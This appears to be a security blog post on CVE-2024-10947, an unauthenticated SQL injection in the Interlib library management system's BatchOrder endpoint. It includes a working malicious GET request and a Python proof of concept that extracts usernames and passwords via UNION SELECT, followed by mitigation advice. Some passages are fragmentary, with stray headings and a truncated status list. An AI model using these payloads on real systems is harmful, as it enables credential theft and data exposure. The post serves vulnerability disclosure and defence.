A critical vulnerability, known as CVE-2024-10947, was discovered in the Guangzhou Tuchuang Computer Software Development Interlib Library Cluster Automation Management System up to version 2..1. This security flaw allows a remote attacker to perform SQL injection by manipulating a specific argument. The issue remains unpatched, and the details, including exploit code, have been made public.
This post breaks down what the vulnerability is, how an attacker can exploit it, and provides exclusive, clear explanations for sysadmins, developers, and security researchers tasked with protecting their systems.
Where’s the Problem?
The vulnerability exists in the /interlib/order/BatchOrder endpoint. Specifically, the file in question is:
/interlib/order/BatchOrder?cmdACT=admin_order&xsl=adminOrder_OrderList.xsl
The attack happens when a user provides unexpected input in the bookrecno parameter. The software does not properly sanitize this parameter before using it in an SQL query.
Take over the entire application or even the server in some cases
In this instance, all an attacker needs is network access to the vulnerable application. No login or credentials are required.
Exploit Method
A simple HTTP GET request with malicious code in the bookrecno field will trigger the vulnerability:
Example Malicious Request
GET /interlib/order/BatchOrder?cmdACT=admin_order&xsl=adminOrder_OrderList.xsl&bookrecno=1'%20OR%201=1-- HTTP/1.1
Host: targetlibrary.example.com
If the input isn’t properly handled, the backend SQL query can be manipulated. Here’s a visual breakdown:
Vulnerable Pseudo-code
# Hypothetical vulnerable code
bookrecno = request.GET.get('bookrecno')
query = "SELECT * FROM orders WHERE bookrecno = '" + bookrecno + "'"
cursor.execute(query)
If bookrecno is set to 1' OR 1=1--, the query becomes
SELECT * FROM orders WHERE bookrecno = '1' OR 1=1--'
This returns all records from the orders table, bypassing any intended restrictions.
Here’s a simple PoC using requests
import requests
url = 'http://targetlibrary.example.com/interlib/order/BatchOrder';
params = {
'cmdACT': 'admin_order',
'xsl': 'adminOrder_OrderList.xsl',
'bookrecno': "' UNION SELECT 1,username,password FROM users-- "
}
response = requests.get(url, params=params)
print(response.text)
This PoC attempts to extract usernames and passwords from a hypothetical users table.
Gain unauthorized admin access
All exploitation can be done remotely without authentication.
Status & Vendor Response
The vendor, Guangzhou Tuchuang, was notified early about this vulnerability but did not respond. As of now:
If possible, restrict or temporarily disable access to
/interlib/order/BatchOrder
2. Apply Input Filtering
Add server-side validation for the bookrecno parameter to ensure it contains only expected data (e.g., numbers).
3. Monitor for Unusual Access
Watch your logs for suspicious requests, especially with SQL meta-characters in URLs.
4. Update Regularly
If/when a patch is released, update immediately.
References
- NVD - CVE-2024-10947
- Vuldb Advisory
- Exploit by aszhc (GitHub)
Conclusion
The critical SQL injection vulnerability CVE-2024-10947 in the Interlib Library Cluster Automation Management System poses a serious risk to libraries and businesses using this software. Immediate action is required, as the exploit is public and there is no vendor fix.
If you run this system, take it seriously and defend your data before someone else gets in.
*This article is original content made simple for broad use. Please reference the advisories above for the most recent technical status.*
Timeline
Published on: 11/07/2024 04:15:03 UTC
Last modified on: 12/11/2024 19:58:55 UTC